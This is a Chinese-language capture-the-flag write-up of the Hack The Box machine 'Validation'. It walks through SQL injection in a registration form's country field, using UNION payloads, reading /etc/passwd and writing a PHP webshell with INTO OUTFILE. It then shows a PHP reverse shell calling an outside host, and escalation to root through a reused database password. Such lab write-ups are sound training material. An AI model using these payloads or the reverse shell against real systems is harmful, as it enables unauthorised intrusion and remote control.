Validation HTB Writeup
2023-03-08 本文已影响0人
doinb1517
logo.png
知识点
1、sql注入(对参数添加特殊字符查看报错,有时候sqlmap跑不出不要放弃,记得手工注入)
WP
user 权限
直接nmap扫描一波
┌──(kali㉿192)-[~]
└─$ nmap -sC -sV 10.10.11.116 1 ⨯ 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-08 16:58 CST
Nmap scan report for 10.10.11.116
Host is up (0.26s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.96 seconds
80端口有一个注册页面
01.png
注册多个用户到同一地区,会显示这个地区的全部用户
02.png
BP抓个包看看
03.png
直接扔进sqlmap里面跑没有结果。。之后尝试将username和country参数后面都加上'看看会不会报错
04.png
注意看报错,重点测试一下
05.png
POST / HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://10.10.11.116
Connection: close
Referer: http://10.10.11.116/
Cookie: user=bbcee2843121a42fabb873a7f8fc337f
Upgrade-Insecure-Requests: 1
username=abbcc&country=payload' UNION SELECT database() -- +
发现数据库名称为registration
06.png
继续注入表名
' UNION SELECT table_name from INFORMATION_SCHEMA.TABLES -- -
07.png
尝试读取文件
' union select load_file("/etc/passwd")-- -
08.png
web目录在/var/www,我们可以上传webshell到/var/www/html目录下
尝试通过sql注入写文件
username=max&country=Andorra' union select "<?php echo system(@$_GET['cmd']); ?>" into outfile "/var/www/html/exp.php"; -- -
09.png
10.png
查看配置文件发现了mysql的用户名和密码
11.png
<?php
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-9qual-global-pw";
$dbname = "registration";
$conn = new mysqli($servername, $username, $password, $dbname);
?>
?>
找到用户htb可以尝试一下此用户和root用户是不是和mysql服务密码复用,发现并不是,老老实实开始反弹shell,将下面的php反弹shell编码
php -r '$sock=fsockopen("10.10.14.9",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
GET /exp.php?cmd=%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d%66%73%6f%63%6b%6f%70%65%6e%28%22%31%30%2e%31%30%2e%31%34%2e%39%22%2c%31%32%33%34%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27 HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=2ffe4e77325d9a7152f7086ea7aa5114
Upgrade-Insecure-Requests: 1
拿到用户权限
$ cat user.txt
c0116910b5b342847a7b04c79ae00035
root 权限
简单试了下刚才的密码可以提升到root权限,这是我见过提权最水的
$ su root
Password: uhc-9qual-global-pw
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
efd2fb1832a33de50b8ff07ec6ce255b
